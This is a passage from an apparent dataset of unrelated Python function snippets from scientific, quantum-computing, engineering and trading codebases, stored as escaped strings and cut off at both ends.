output_bed_fp = open (output_bed_fn, \"w\")\n output_bed_fp.write(Site.BED_header(sample_id)+\"\\n\")\n if output_tsv_fn:\n output_tsv_fp = open (output_tsv_fn, \"w\")\n output_tsv_fp.write(Site.TSV_header()+\"\\n\")\n\n for k, offset_list in tqdm(filtered_site_dict.items(), desc=\"\\t\", unit=\" sites\", disable=log.level>=30):\n # Get all read lines corresponding to current site\n ll = []\n for offset in offset_list:\n input_fp.seek(offset, 0)\n ll.append(lp(input_fp.readline()))\n\n # Parse list with helper class Site\n site = Site(ll=ll, id=hash(k))\n counter[\"Valid sites\"]+=1\n if output_bed_fn:\n output_bed_fp.write(site.to_bed()+\"\\n\")\n if output_tsv_fn:\n output_tsv_fp.write(site.to_tsv()+\"\\n\")\n finally:\n input_fp.close()\n if output_bed_fn:\n output_bed_fp.close()\n if output_tsv_fn:\n output_tsv_fp.close()\n\n log.info (\"## Results summary ##\")\n log.info (dict_to_str(counter, nsep=1))", "def run_workflow_couplings(config: _data.DerivativeCoupling) -> PromisedObject:\n # compute the molecular orbitals\n logger.info(\"starting couplings calculation!\")\n mo_paths_hdf5, energy_paths_hdf5 = unpack(calculate_mos(config), 2)\n\n # Overlap matrix at two different times\n promised_overlaps = calculate_overlap(config, mo_paths_hdf5)\n\n # Calculate Non-Adiabatic Coupling\n promised_crossing_and_couplings = lazy_couplings(config, promised_overlaps)\n\n # Write the results in PYXAID format\n config.path_hamiltonians = create_path_hamiltonians(config.workdir, config.orbitals_type)\n\n # Inplace scheduling of write_hamiltonians function.\n # Equivalent to add @schedule on top of the function\n schedule_write_ham = schedule(write_hamiltonians)\n\n # Number of matrix computed\n config.npoints = len(config.geometries) - 2\n\n # Write Hamilotians in PYXAID format\n promise_files = schedule_write_ham(\n config, promised_crossing_and_couplings, mo_paths_hdf5)\n\n return gather(promise_files, energy_paths_hdf5)", "def _calc_Tx(self, name, x=None, lambdify=True):\n\n Tx = None\n Tx_func = None\n filename = name + '[0,0,0]' if np.allclose(x, 0) else name\n filename += '_Tx'\n # check to see if we have our transformation saved in file\n Tx, Tx_func = self._load_from_file(filename, lambdify)\n\n if Tx is None and Tx_func is None:\n print('Generating transform function for %s' % filename)\n T = self._calc_T(name=name)\n # transform x into world coordinates\n if np.allclose(x, 0):\n # if we're only interested in the origin, not including\n # the x variables significantly speeds things up\n Tx = T * sp.Matrix([0, 0, 0, 1])\n else:\n # if we're interested in other points in the given frame\n # of reference, calculate transform with x variables\n Tx = T * sp.Matrix(self.x + [1])\n Tx = sp.Matrix(Tx)\n\n # save to file\n abr_control.utils.os_utils.makedirs(\n '%s/%s' % (self.config_folder, filename))\n cloudpickle.dump(sp.Matrix(Tx), open(\n '%s/%s/%s' % (self.config_folder, filename, filename),\n 'wb'))\n\n if lambdify is False:\n # if should return expression not function\n return Tx\n\n if Tx_func is None:\n Tx_func = self._generate_and_save_function(\n filename=filename, expression=Tx,\n parameters=self.q+self.x)\n return Tx_func", "def test_multirz_decomposition(self, diff_method):\r\n dev = qml.device(\"default.qubit\", wires=3)\r\n\r\n def circuit(a, b):\r\n qml.RX(a, wires=0)\r\n qml.MultiRZ(b, wires=[0, 1, 2])\r\n return qml.expval(qml.PauliX(0))\r\n\r\n circuit = qml.QNode(circuit, dev, diff_method=diff_method)\r\n params = [0.1, 0.2]\r\n result = qml.metric_tensor(circuit)(*params)\r\n assert result.shape == (2, 2)", "def __call__ ( self , args , cor = None ) :\n n = self.N \n assert len ( args ) == n , 'Invalid argument size'\n\n ## get value of the function \n val = self.func ( *args )\n \n c2 = 0\n \n x = n * [ 0 ] ## argument \n g = n * [ 0 ] ## gradient \n \n for i in range ( n ) :\n\n xi = VE ( args[i] )\n x [i] = x \n \n ci = xi.cov2()\n if ci < 0 or iszero ( ci ) : continue\n \n di = self.partial[i] ( *args )\n if iszero ( di ) : continue\n \n ei = xi.error() \n\n g [i] = di \n e [i] = ei\n \n ## diagonal correlation coefficients are assumed to be 1 and ignored! \n c2 += ci * di * di\n \n for j in range ( i ) : \n\n xj = x [ j ]\n cj = xj.cov2 () \n if cj < 0 or iszero ( cj ) : continue\n dj = d [ j ]\n if iszero ( dj ) : continue \n ej = e [ j ]\n\n rij = self.__corr ( cor , i , j ) if cor else 0 \n assert -1 <= rij <= 1 or isequal ( abs ( rij ) , 1 ) ,\\\n 'Invalid correlaation coefficient (%d,%d)=%s ' % ( i , j , rij )\n \n c2 += 2.0 * di * dj * rij * ei * ej \n \n return VE ( val , c2 )", "def __call__(self, event_type, energy=1000):\r\n cdb_psf = self.cdb_psf \r\n \r\n class PSF(object):\r\n def __init__(self, event_type, energy):\r\n self.event_type =event_type\r\n self.setEnergy(energy)\r\n self.parent = cdb_psf # reference for clients that need it, like convolution\r\n \r\n def setEnergy(self, energy):\r\n self.energy=energy\r\n self.cpsf = cdb_psf.get_cpp_psf(energy,event_type) # for access to C++\r\n class TBand(object):\r\n def __init__(self, energy, event_type, **kwargs):\r\n self.e, self.ct = energy, event_type\r\n self.__dict__.update(kwargs)\r\n \r\n self.bpsf = pypsf.BandCALDBPsf(cdb_psf, TBand(self.energy, self.event_type),\r\n override_en=False,adjust_mean=False)\r\n\r\n def __repr__(self):\r\n return 'PSF for event_type %d, energy %.0f MeV' % (self.event_type, self.energy)\r\n \r\n def __call__(self, delta):\r\n return self.bpsf(delta)\r\n def integral(self, dmax, dmin=0):\r\n \"\"\" this does not seem to be the integral over solid angle\"\"\"\r\n # more expressive\r\n #return integrate.quad(lambda r: 2*np.pi*r*self(r), dmin, dmax)[0]\r\n return self.bpsf.integral(dmax, dmin)\r\n def inverse_integral(self, percent=68,on_axis=False): \r\n return self.parent.inverse_integral(self.energy, self.event_type, percent, on_axis)\r\n \r\n def overlap(self, roi_dir, radius, skydir): #not tested\r\n #return pypsf.PsfOverlap()(roi_dir, self.sd, skydir) \r\n return self.cpsf.overlap_circle(roi_dir, np.radians(radius), skydir)\r\n \r\n return PSF(event_type, energy)", "def initialize(context): \r\n context.lookback_window = 3 # look back window for technical indicator calculations.\r\n context.data_history_window = 150 # we will accumulate data from the past 1000 days.\r\n context.price_current = [] # initialize empty current price list. This is a float.\r\n context.equities = [] # list of type string. Will contain the names of all equities traded by the algorithm\r\n context.technical_indicator_data = pd.DataFrame() # initialize an empty pandas dataframe that can hold data of three technical indicators\r\n context.leverage_buffer = 0.95 # limits leverage, or equities brought on credit. This will solve problems of overshorting our portfolio \r\n context.weight = {}\r\n context.ENSEMBLE_PREDICTION = 0.0\r\n \r\n # gather the technical indicators at 10 AM each stock-trading day \r\n schedule_function(get_initial_price, \r\n date_rules.every_day(),\r\n time_rules.market_open(minutes = 1))\r\n # conduct calculations using the NN and KNN\r\n schedule_function(predict_and_weigh,\r\n date_rules.every_day(), \r\n time_rules.market_open(minutes = 2))\r\n # trade\r\n schedule_function(trade, \r\n date_rules.every_day(),\r\n time_rules.market_open(minutes = 3))\r\n # close all the positions made in previous day\r\n schedule_function(close_position,\r\n date_rules.every_day(),\r\n time_rules.market_close(minutes = 1))\r\n # Record tracking variables at the end of each day. Variables will include the correlation of training data\r\n schedule_function(my_record_vars, \r\n date_rules.every_day(), \r\n time_rules.market_close())\r\n # Create our dynamic stock selector.\r\n attach_pipeline(make_pipeline(), 'my_pipeline')", "def _compose(self, other):\n if self.num_qubits != other.num_qubits:\n raise QiskitError(\"Multiplication on different number of qubits.\")\n result = CNOTDihedral(num_qubits=self.num_qubits)\n result.shift = [\n (x[0] + x[1]) % 2 for x in zip(self._z2matvecmul(other.linear, self.shift), other.shift)\n ]\n result.linear = self._z2matmul(other.linear, self.linear)\n # Compute x' = B1*x + c1 using the p_j identity\n new_vars = []\n for i in range(self.num_qubits):\n support = np.arange(other.num_qubits)[np.nonzero(self.linear[i])]\n poly = SpecialPolynomial(self.num_qubits)\n poly.set_pj(support)\n if self.shift[i] == 1:\n poly = -1 * poly\n poly.weight_0 = (poly.weight_0 + 1) % 8\n new_vars.append(poly)\n # p' = p1 + p2(x')\n result.poly = self.poly + other.poly.evaluate(new_vars)\n return result", "def calc_Cinv_boiler(Q_design_W, technology_type, boiler_cost_data):\n Capex_a_Boiler_USD = 0.0\n Opex_a_fix_Boiler_USD = 0.0\n Capex_Boiler_USD = 0.0\n\n if Q_design_W > 0.0:\n boiler_cost_data = boiler_cost_data[boiler_cost_data['code'] == technology_type]\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if Q_design_W < boiler_cost_data.iloc[0]['cap_min']:\n Q_design_W = boiler_cost_data.iloc[0]['cap_min']\n max_boiler_size = boiler_cost_data.iloc[0]['cap_max']\n\n if Q_design_W <= max_boiler_size:\n\n boiler_cost_data = boiler_cost_data[\n (boiler_cost_data['cap_min'] <= Q_design_W) & (boiler_cost_data['cap_max'] > Q_design_W)]\n\n Inv_a = boiler_cost_data.iloc[0]['a']\n Inv_b = boiler_cost_data.iloc[0]['b']\n Inv_c = boiler_cost_data.iloc[0]['c']\n Inv_d = boiler_cost_data.iloc[0]['d']\n Inv_e = boiler_cost_data.iloc[0]['e']\n Inv_IR = boiler_cost_data.iloc[0]['IR_%']\n Inv_LT = boiler_cost_data.iloc[0]['LT_yr']\n Inv_OM = boiler_cost_data.iloc[0]['O&M_%'] / 100.0\n\n InvC = Inv_a + Inv_b * (Q_design_W) ** Inv_c + (Inv_d + Inv_e * Q_design_W) * log(Q_design_W)\n\n Capex_a_Boiler_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_a_fix_Boiler_USD = InvC * Inv_OM\n Capex_Boiler_USD = InvC\n\n else:\n number_of_boilers = int(ceil(Q_design_W / max_boiler_size))\n Q_nom_W = Q_design_W / number_of_boilers\n\n boiler_cost_data = boiler_cost_data[\n (boiler_cost_data['cap_min'] <= Q_nom_W) & (boiler_cost_data['cap_max'] > Q_nom_W)]\n\n Inv_a = boiler_cost_data.iloc[0]['a']\n Inv_b = boiler_cost_data.iloc[0]['b']\n Inv_c = boiler_cost_data.iloc[0]['c']\n Inv_d = boiler_cost_data.iloc[0]['d']\n Inv_e = boiler_cost_data.iloc[0]['e']\n Inv_IR = boiler_cost_data.iloc[0]['IR_%']\n Inv_LT = boiler_cost_data.iloc[0]['LT_yr']\n Inv_OM = boiler_cost_data.iloc[0]['O&M_%'] / 100.0\n\n InvC = (Inv_a + Inv_b * (Q_nom_W) ** Inv_c + (Inv_d + Inv_e * Q_nom_W) * log(Q_nom_W)) * number_of_boilers\n\n Capex_a_Boiler_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_a_fix_Boiler_USD = InvC * Inv_OM\n Capex_Boiler_USD = InvC\n\n return Capex_a_Boiler_USD, Opex_a_fix_Boiler_USD, Capex_Boiler_USD", "def derivatives(self, increment_filter):\n ######################################################################\n # derivatives fluid and mass balance are static\n k = self.num_nw_fluids + 1\n\n ######################################################################\n # derivatives for specified heat transfer\n if self.Q.is_set:\n self.jacobian[k, 0, 0] = (\n self.outl[0].h.val_SI - self.inl[0].h.val_SI)\n self.jacobian[k, 0, 2] = -self.inl[0].m.val_SI\n self.jacobian[k, 1, 2] = self.inl[0].m.val_SI\n # custom variable Q\n if self.Q.is_var:\n self.jacobian[k, 2 + self.Q.var_pos, 0] = -1\n k += 1\n\n ######################################################################\n # derivatives for specified pressure ratio\n if self.pr.is_set:\n self.jacobian[k, 0, 1] = self.pr.val\n self.jacobian[k, 1, 1] = -1\n # custom variable pr\n if self.pr.is_var:\n self.jacobian[k, 2 + self.pr.var_pos, 0] = (\n self.inl[0].p.val_SI)\n k += 1\n\n ######################################################################\n # derivatives for specified zeta\n if self.zeta.is_set:\n f = self.zeta_func\n if not increment_filter[0, 0]:\n self.jacobian[k, 0, 0] = self.numeric_deriv(\n f, 'm', 0, zeta='zeta')\n if not increment_filter[0, 2]:\n self.jacobian[k, 0, 1] = self.numeric_deriv(\n f, 'p', 0, zeta='zeta')\n if not increment_filter[0, 2]:\n self.jacobian[k, 0, 2] = self.numeric_deriv(\n f, 'h', 0, zeta='zeta')\n if not increment_filter[1, 1]:\n self.jacobian[k, 1, 1] = self.numeric_deriv(\n f, 'p', 1, zeta='zeta')\n if not increment_filter[1, 2]:\n self.jacobian[k, 1, 2] = self.numeric_deriv(\n f, 'h', 1, zeta='zeta')\n # custom variable zeta\n if self.zeta.is_var:\n self.jacobian[k, 2 + self.zeta.var_pos, 0] = (\n self.numeric_deriv(f, 'zeta', 2, zeta='zeta'))\n k += 1\n\n ######################################################################\n # derivatives for specified hydro-group parameters\n if self.hydro_group.is_set:\n # hazen williams equation\n if self.hydro_group.method == 'HW':\n func = self.hw_func\n # darcy friction factor\n else:\n func = self.darcy_func\n\n if not increment_filter[0, 0]:\n self.jacobian[k, 0, 0] = self.numeric_deriv(func, 'm', 0)\n if not increment_filter[0, 1]:\n self.jacobian[k, 0, 1] = self.numeric_deriv(func, 'p', 0)\n if not increment_filter[0, 2]:\n self.jacobian[k, 0, 2] = self.numeric_deriv(func, 'h', 0)\n if not increment_filter[1, 1]:\n self.jacobian[k, 1, 1] = self.numeric_deriv(func, 'p', 1)\n if not increment_filter[1, 2]:\n self.jacobian[k, 1, 2] = self.numeric_deriv(func, 'h', 1)\n # custom variables of hydro group\n for var in self.hydro_group.elements:\n if var.is_var:\n self.jacobian[k, 2 + var.var_pos, 0] = (\n self.numeric_deriv(func, self.vars[var], 2))\n k += 1\n\n ######################################################################\n # derivatives for additional equations\n self.additional_derivatives(increment_filter, k)", "def corr():\n\n @sinks\n def _dagpype_internal_fn_act(target):\n c = dagpype_c.Correlator()\n try:\n while True:\n x, y = (yield)\n c.push(float(x), float(y))\n except GeneratorExit:\n target.send(c.corr())\n target.close()\n return _dagpype_internal_fn_act", "def test_jax(self, diff_method, tol):\r\n if diff_method == \"parameter-shift\":\r\n pytest.skip(\"Does not support parameter-shift\")\r\n\r\n jax = pytest.importorskip(\"jax\")\r\n from jax import numpy as jnp\r\n\r\n dev = qml.device(\"default.qubit.jax\", wires=2)\r\n\r\n @qml.qnode(dev, interface=\"jax\", diff_method=\"backprop\")\r\n def circuit(weights):\r\n qml.RX(weights[0], wires=0)\r\n qml.RY(weights[1], wires=0)\r\n qml.CNOT(wires=[0, 1])\r\n qml.PhaseShift(weights[2], wires=1)\r\n return qml.expval(qml.PauliX(0)), qml.expval(qml.PauliX(1))\r\n\r\n circuit.interface = \"jax\"\r\n\r\n def cost(weights):\r\n return qml.metric_tensor(circuit)(weights)[2, 2]\r\n\r\n weights = jnp.array([0.432, 0.12, -0.432])\r\n a, b, c = weights\r\n\r\n grad = jax.grad(cost)(weights)\r\n expected = np.array(\r\n [np.cos(a) * np.cos(b) ** 2 * np.sin(a) / 2, np.cos(a) ** 2 * np.sin(2 * b) / 4, 0]\r\n )\r\n assert np.allclose(grad, expected, atol=tol, rtol=0)", "def __init__(self, *args):\n _ITKCostFunctionsPython.itkMultipleValuedVnlCostFunctionAdaptor_swiginit(self,_ITKCostFunctionsPython.new_itkMultipleValuedVnlCostFunctionAdaptor(*args))", "def __init__(self,\n X_seed,\n y_seed,\n X_full,\n target_function,\n acquisition_function='cb',\n exploration_steps=10,\n batch_size=100,\n batch_update=False,\n kernel='RBF',\n lengthscale=None,\n sparse=False,\n indpoints=None,\n gp_iterations=1000,\n seed=0,\n **kwargs):\n self.verbose = kwargs.get(\"verbose\", 1)\n self.use_gpu = kwargs.get(\"use_gpu\", False)\n learning_rate = kwargs.get(\"learning_rate\", 5e-2)\n jitter = kwargs.get(\"jitter\", 1.0e-6)\n isotropic = kwargs.get(\"isotropic\", False)\n self.precision = kwargs.get(\"precision\", \"double\")\n\n if self.use_gpu and torch.cuda.is_available():\n if self.precision == \"single\":\n torch.set_default_tensor_type(torch.cuda.FloatTensor)\n else:\n torch.set_default_tensor_type(torch.cuda.DoubleTensor)\n else:\n if self.precision == \"single\":\n torch.set_default_tensor_type(torch.FloatTensor)\n else:\n torch.set_default_tensor_type(torch.DoubleTensor)\n\n self.surrogate_model = gpr.reconstructor(\n X_seed, y_seed, X_full, kernel, lengthscale, sparse, indpoints,\n learning_rate, gp_iterations, self.use_gpu, self.verbose, seed,\n isotropic=isotropic, precision=self.precision, jitter=jitter)\n\n self.X_sparse = X_seed.copy()\n self.y_sparse = y_seed.copy()\n self.X_full = X_full\n\n self.target_function = target_function\n self.acquisition_function = acquisition_function\n self.exploration_steps = exploration_steps\n self.batch_update = batch_update\n self.batch_size = batch_size\n self.simulate_measurement = kwargs.get(\"simulate_measurement\", False)\n if self.simulate_measurement:\n self.y_true = kwargs.get(\"y_true\")\n if self.y_true is None:\n raise AssertionError(\n \"To simulate measurements, add ground truth ('y_true)\")\n self.extent = kwargs.get(\"extent\", None)\n self.alpha, self.beta = kwargs.get(\"alpha\", 0), kwargs.get(\"beta\", 1)\n self.xi = kwargs.get(\"xi\", 0.01)\n self.dscale = kwargs.get(\"dscale\", None)\n self.batch_dscale = kwargs.get(\"batch_dscale\", None)\n self.batch_out_max = kwargs.get(\"batch_out_max\", 10)\n self.gamma = kwargs.get(\"gamma\", 0.8)\n self.points_mem = kwargs.get(\"memory\", 10)\n self.exit_strategy = kwargs.get(\"exit_strategy\", 1)\n self.mask = kwargs.get(\"mask\", None)\n self.save_checkpoints = kwargs.get(\"save_checkpoints\", False)\n self.filename = kwargs.get(\"filename\", \"./boptim_results\")\n self.indices_all, self.vals_all = [], []\n self.target_func_vals, self.gp_predictions = [y_seed.copy()], []", "def _fcts():\n import numpy # pylint: disable=C0415\n from .cbenchmark_dot import vector_dot_product # pylint: disable=E0611,C0415\n from .cbenchmark_dot import vector_dot_product16 # pylint: disable=E0611,C0415\n from .cbenchmark_dot import vector_dot_product16_nofcall # pylint: disable=E0611,C0415\n from .cbenchmark_dot import vector_dot_product16_sse # pylint: disable=E0611,C0415\n\n def simple_dot(values):\n return numpy.dot(values, values)\n\n def c11_dot(vect):\n return vector_dot_product(vect, vect)\n\n def c11_dot16(vect):\n return vector_dot_product16(vect, vect)\n\n def c11_dot16_nofcall(vect):\n return vector_dot_product16_nofcall(vect, vect)\n\n def c11_dot16_sse(vect):\n return vector_dot_product16_sse(vect, vect)\n\n return [simple_dot, c11_dot, c11_dot16, c11_dot16_nofcall, c11_dot16_sse]", "def _new_comp(self, basis):\n from .comp import KroneckerDelta\n if self._is_identity:\n fmodule = self._fmodule\n return KroneckerDelta(fmodule._ring, basis,\n start_index=fmodule._sindex,\n output_formatter=fmodule._output_formatter)\n return FreeModuleTensor._new_comp(self, basis)", "def __init__(self):\n super(ASYMMETRIC, self).__init__(quant_type=Constants.QZ_ASYMMETRIC)", "def getQValue(self, state, action):\n \"\"\"Description:\n [Enter a description of what you did here.]\n Use first equation in slide 71 of MDP to compute q-value depond on weights and current features.\n \n !! But I think what I did is not work for IdentityExtractor. Because feature of IdentityExtrator always return 1,\n it did not change even a ghost is closing.\n \"\"\"\n \"\"\" YOUR CODE HERE \"\"\"\n # if weight is empty, then weight will need to initial to 1 for all features\n # According to which Extractor user choose, weight counter will have equal number of keys.\n if len(self.weight) == 0:\n feat = self.featExtractor.getFeatures(state, action)\n self.weight.incrementAll(feat.keys(), 1)\n \n qValue = self.weight * self.featExtractor.getFeatures(state,action)\n return qValue\n \"\"\" END CODE \"\"\"", "def calculate_correlation(data):\n pass", "def test_trig2_vector():\n p=[1,1,1]\n c=[0.5,0.5,3]\n def myfunc(x,y,z):\n a = (EF.sin(x))\n b = (EF.arccos(y))\n c = (EF.tan(z))\n return a + b + c\n\n f_obj=ADiff(myfunc)\n res=f_obj.pJac(c,p)\n calc_diff = round(res['diff'],10)\n assert {'diff':round(0.7432015404535481,10), 'value': math.sin(c[0])+ math.acos(c[1]) + math.tan(c[2])} == {'diff':round(res['diff'],10),'value':res['value']}#diff values differ at last digits when calculate with math.cos(c[0])- 1/(math.sqrt(1-c[1]**2))+ 1/(math.cos(c[2])*math.cos(c[2]))", "def test_QFTn(n):\n q = QuantumRegister(n, 'q') # +lost+lost2\n circ = QuantumCircuit(q)\n circ.x(q[0])\n RegX = [q[i] for i in range(n)]\n QFTn(circ, q, RegX)\n print(RegX)\n iQFTn(circ, q, RegX)\n launch2(circ)\n circ_m = measure_direct(circ, q, RegX)\n return circ_m", "def __init__(self,\n func=None,\n refresh_period=0,\n window_length=None,\n clean_nans=True,\n sids=None,\n fields=None,\n compute_only_full=True,\n bars='daily',\n downsample=False):\n if func is not None:\n self.compute_transform_value = func\n else:\n self.compute_transform_value = self.get_value\n\n self.clean_nans = clean_nans\n self.compute_only_full = compute_only_full\n # no need to down sample if the bars are already daily\n self.downsample = downsample and (bars == 'minute')\n\n # How many bars are in a day\n self.bars = bars\n if self.bars == 'daily':\n self.bars_in_day = 1\n elif self.bars == 'minute':\n self.bars_in_day = int(6.5 * 60)\n else:\n raise ValueError('%s bars not understood.' % self.bars)\n\n # The following logic is to allow pre-specified sid filters\n # to operate on the data, but to also allow new symbols to\n # enter the batch transform's window IFF a sid filter is not\n # specified.\n if sids is not None:\n if isinstance(sids, (string_types, Integral)):\n self.static_sids = set([sids])\n else:\n self.static_sids = set(sids)\n else:\n self.static_sids = None\n\n self.initial_field_names = fields\n if isinstance(self.initial_field_names, string_types):\n self.initial_field_names = [self.initial_field_names]\n self.field_names = set()\n\n self.refresh_period = refresh_period\n\n check_window_length(window_length)\n self.window_length = window_length\n\n self.trading_days_total = 0\n self.window = None\n\n self.full = False\n # Set to -inf essentially to cause update on first attempt.\n self.last_dt = pd.Timestamp('1900-1-1', tz='UTC')\n\n self.updated = False\n self.cached = None\n self.last_args = None\n self.last_kwargs = None\n\n # Data panel that provides bar information to fill in the window,\n # when no bar ticks are available from the data source generator\n # Used in universes that 'rollover', e.g. one that has a different\n # set of stocks per quarter\n self.supplemental_data = None\n\n self.rolling_panel = None\n self.daily_rolling_panel = None", "def query(self):\n self._measurements[self.KEY_FMIX].df = self.fetch_data_fmix()\n self._measurements[self.KEY_EMIS].df = self.co2_calc(self._measurements[self.KEY_FMIX].df)", "def test_qft_reconstruction(self, interface):\n circuit = qft_circuit(3, interface=interface)\n bits, recipes = circuit()\n shadow = ClassicalShadow(bits, recipes)\n\n state = shadow.global_snapshots()\n assert state.shape == (10000, 8, 8)\n\n state = np.mean(state, axis=0)\n expected = np.exp(np.arange(8) * 2j * np.pi / 8) / np.sqrt(8)\n expected = np.outer(expected, np.conj(expected))\n\n assert qml.math.allclose(state, expected, atol=1e-1)", "def fx(self) -> float:\n\n return self.intrinsic_matrix[0, 0]", "def temperature_diff_wrapped(q: float,\n delta_tc: np.ndarray,\n T_r:np.ndarray,\n order = 1) -> callable:\n \n def objective_function(T_cr: np.ndarray) -> np.ndarray:\n\n \"\"\"\n the function to minimize in order to get the non-linear\n relationship for the geometrically extrapolated cooled surface temperatures\n \"\"\"\n \n Tm = (T_r + T_cr)/2.0\n ks = thermal_conductivity(Tm)\n T_cr_update = cooled_surface_temp_actual(T_r,q,delta_tc,ks)\n \n return np.linalg.norm(T_cr_update - T_cr,ord = 1)\n \n return objective_function", "def _call(self, x):\n u = functional.tmp_u_prox\n v = functional.tmp_v_prox\n\n # Running generalized Sinkhorn iterations\n for j in range(functional.niter):\n # Safe-guarded u-update, to avoid divide-by-zero error.\n u_old = u.copy()\n tmp1 = functional.K_op(v)\n if np.min(tmp1) < 1e-30 or np.max(tmp1) > 1e+50:\n print('Numerical instability, truncation in Transport prox (Kv)',\n str(np.min(tmp1)), str(np.max(tmp1)))\n\n tmp = np.fmax(tmp1, 1e-30)\n\n\n u = functional.mu0 / tmp\n if np.min(u) < 1e-30 or np.max(u) > 1e+50:\n print('u (min/max)', str(np.min(u)), str(np.max(u)))\n\n # Safe-guarded v-update, to avoid divide-by-zero error.\n v_old = v.copy()\n\n tmp3 = functional.K_op_adjoint(u)\n if np.min(tmp3) < 1e-30 or np.max(tmp3) > 1e+50:\n print('Truncation in Transport prox (KTu)',\n str(np.min(tmp3)), str(np.max(tmp3)))\n print('u (min/max)', str(np.min(u)), str(np.max(u)))\n\n tmp4 = (self.const * tmp3 * np.exp(self.const * x))\n\n if np.min(tmp4) < 1e-30 or np.max(tmp4) > 1e+200:\n print('Argument in lambdert omega (min/max)',\n str(np.min(tmp4)), str(np.max(tmp4)))\n\n v = np.exp(self.const * x - lambertw_fulfix(tmp4))\n\n v1 = np.exp(self.const * x - scipy.special.lambertw(\n tmp4))\n if (v-v1).norm() > 1e-10:\n print('diff pga ny lambderw omega funciton',\n str((v-v1).norm()))\n print('v (min/max)', str(np.min(v)), str(np.max(v)))\n print('Argument in lambdert omega (min/max)',\n str(np.min(tmp4)), str(np.max(tmp4)))\n\n # If the updates in both u and v are small, break the loop\n if ((np.log(v)-np.log(v_old)).norm() < 1e-8 and\n (np.log(u)-np.log(u_old)).norm() < 1e-8):\n break\n\n # Store the u and v in the internal temporary variables of the\n # functional\n functional.tmp_u_prox = u\n functional.tmp_v_prox = v\n\n return x - self.sigma * functional.epsilon * np.log(v)", "def test_jax(self, tol):\n\n import jax\n import jax.numpy as jnp\n\n shapes = expected_shapes(1, 2)\n weights = [np.random.random(shape) for shape in shapes]\n weights = [jnp.array(w) for w in weights]\n\n dev = DummyDevice(wires=2)\n\n circuit = qml.QNode(circuit_template, dev)\n circuit2 = qml.QNode(circuit_decomposed, dev)\n\n res = circuit(*weights)\n res2 = circuit2(*weights)\n assert qml.math.allclose(res, res2, atol=tol, rtol=0)\n\n grad_fn = jax.grad(circuit)\n grads = grad_fn(*weights)\n\n grad_fn2 = jax.grad(circuit2)\n grads2 = grad_fn2(*weights)\n\n assert np.allclose(grads[0], grads2[0], atol=tol, rtol=0)", "def qfunc(x):\n # Error check inputs\n if isinstance(x, np.ndarray):\n if x.dtype == np.complex128:\n raise TypeError(\"complex input not supported\")\n else:\n if isinstance(x, complex):\n raise TypeError(\"complex input not supported\")\n\n Q = 0.5 * erfc(x / np.sqrt(2.0))\n return Q", "def test_differentiable_expand(self, execute_kwargs, tol):\n\n class U3(qml.U3):\n def expand(self):\n theta, phi, lam = self.data\n wires = self.wires\n return [\n qml.Rot(lam, theta, -lam, wires=wires),\n qml.PhaseShift(phi + lam, wires=wires),\n ]\n\n def cost_fn(a, p, device):\n qscript = qml.tape.QuantumScript(\n [qml.RX(a, wires=0), U3(*p, wires=0)], [qml.expval(qml.PauliX(0))]\n )\n qscript = qscript.expand(stop_at=lambda obj: device.supports_operation(obj.name))\n return execute([qscript], device, **execute_kwargs)[0]\n\n a = jax.numpy.array(0.1)\n p = jax.numpy.array([0.1, 0.2, 0.3])\n\n dev = qml.device(\"default.qubit\", wires=1)\n res = jax.jit(cost_fn, static_argnums=2)(a, p, device=dev)\n expected = np.cos(a) * np.cos(p[1]) * np.sin(p[0]) + np.sin(a) * (\n np.cos(p[2]) * np.sin(p[1]) + np.cos(p[0]) * np.cos(p[1]) * np.sin(p[2])\n )\n assert np.allclose(res, expected, atol=tol, rtol=0)\n\n jac_fn = jax.jit(jax.grad(cost_fn, argnums=(1)), static_argnums=2)\n res = jac_fn(a, p, device=dev)\n expected = jax.numpy.array(\n [\n np.cos(p[1]) * (np.cos(a) * np.cos(p[0]) - np.sin(a) * np.sin(p[0]) * np.sin(p[2])),\n np.cos(p[1]) * np.cos(p[2]) * np.sin(a)\n - np.sin(p[1])\n * (np.cos(a) * np.sin(p[0]) + np.cos(p[0]) * np.sin(a) * np.sin(p[2])),\n np.sin(a)\n * (np.cos(p[0]) * np.cos(p[1]) * np.cos(p[2]) - np.sin(p[1]) * np.sin(p[2])),\n ]\n )\n assert np.allclose(res, expected, atol=tol, rtol=0)", "def test_statistics_calculator_transfer_function():\n from resistics.statistics.calculator import StatisticCalculator\n import numpy as np\n\n specData, evalfreq = get_spectrum_data()\n calculator = StatisticCalculator()\n calculator.winLen = 1\n assert calculator.winLen == 1\n calculator.setSpectra(specData.freqArray, specData, evalfreq)\n statData = calculator.getDataForStatName(\"transferFunction\")\n testData = {\n 24: {\n \"ExHxRes\": 0.0051423310440927615,\n \"ExHxPhase\": -38.08089717250079,\n \"ExHxReal\": 0.6183338309943266,\n \"ExHxImag\": -0.484502836667662,\n \"ExHyRes\": 0.002406937394247041,\n \"ExHyPhase\": -79.49669804710025,\n \"ExHyReal\": 0.09796954314720807,\n \"ExHyImag\": -0.5284263959390865,\n \"EyHxRes\": 0.003364188314919875,\n \"EyHxPhase\": 40.70059399014801,\n \"EyHxReal\": 0.48169602866527317,\n \"EyHxImag\": 0.4143326366079426,\n \"EyHyRes\": 0.001522842639593909,\n \"EyHyPhase\": 49.044485574181074,\n \"EyHyReal\": 0.2802030456852794,\n \"EyHyImag\": 0.3228426395939085,\n },\n 40: {\n \"ExHxRes\": 0.0021009588268471532,\n \"ExHxPhase\": -12.512585801455565,\n \"ExHxReal\": 0.6328257191201355,\n \"ExHxImag\": -0.14043993231810512,\n \"ExHyRes\": 0.0017318809926677931,\n \"ExHyPhase\": -91.1943471837543,\n \"ExHyReal\": -0.012267343485617588,\n \"ExHyImag\": -0.5884094754653127,\n \"EyHxRes\": 0.002820078962210943,\n \"EyHxPhase\": 120.6095367512591,\n \"EyHxReal\": -0.3824027072758038,\n \"EyHxImag\": 0.6463620981387479,\n \"EyHyRes\": 0.0006838691483361542,\n \"EyHyPhase\": 1.4419233716812918,\n \"EyHyReal\": 0.36971235194585467,\n \"EyHyImag\": 0.009306260575296085,\n },\n }\n for efreq in evalfreq:\n for key, val in statData[efreq].items():\n np.testing.assert_almost_equal(val, testData[efreq][key])", "def 